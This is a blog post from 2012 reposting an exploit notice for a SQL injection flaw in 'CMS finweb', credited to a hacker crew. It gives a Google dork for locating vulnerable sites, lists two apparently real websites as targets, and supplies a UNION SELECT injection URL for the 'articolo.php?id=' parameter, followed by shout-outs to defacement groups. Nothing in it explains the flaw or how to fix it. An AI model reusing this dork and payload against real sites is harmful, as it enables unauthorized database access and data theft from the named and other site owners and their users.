Wednesday, January 18, 2012

CMS finweb SQL Injection Exploit

http://www.hungry-hackers.com/wp-content/uploads/2011/02/sql_img.jpg


##############################################################
# Exploit Title: CMS finweb SQL Injection Exploit            #
# Google Dork: "articolo.php?id="         #
# Date: 10 - 1 - 2011                                        #
# Author: ho1onk a.k.a hogyz                                 #
# Software Link: http://www.finweb.biz/                      #
# Version: N/A                                               #
# Tested on: Windows Xp                                      #
# CVE : -                                                    #
##############################################################

http://www.kousmine.it/articolo.php?id=[SQLi]

http://www.uomo-libero.com/articolo.php?id=[SQLi]

Exploit !

http://[target]/articolo.php?id=-1+union+select+0,1,2,3,4,5,6,7,8,9,x,x,x--

Thanks to :
GOD, dopunk, Up, n4153n, alecs, dika-xb

Slap :
newbie-herbet, billgates, Pro_Wikileaks, duniacare, topenghitam, virapas, KillerByte
BrainAC, gilang, devil-404, teguh, penghuni channel #MedanCyberTeam & you

MedanCyberTeam, HN-Community, Gorontalo Defacer

###########################################################################

~ KU KAN TETAP TERBANG WALAU SAYAP KU TAK SEHEBAT SAYA MU ~

###########################################################################

www.hacker-newbie.org - irc://irc.lumajangcrew.co.cc 

   _____             .___             _________        ___.
  /     \   ____   __| _/____    ____ \_   ___ \___.__.\_ |__   ___________
 /  \ /  \_/ __ \ / __ |\__  \  /    \/    \  \<   |  | | __ \_/ __ \_  __ \
/    Y    \  ___// /_/ | / __ \|   |  \     \___\___  | | \_\ \  ___/|  | \/
\____|__  /\___  >____ |(____  /___|  /\______  / ____| |___  /\___  >__|
        \/     \/     \/     \/     \/        \/\/          \/     \/
___________
\__    ___/___ _____    _____
  |    |_/ __ \\__  \  /     \
  |    |\  ___/ / __ \|  Y Y  \
  |____| \___  >____  /__|_|  / .web.id
             \/     \/      \/

0 comments :

Post a Comment

 
Design by blogger templates | powered by cbfteam official | zone-h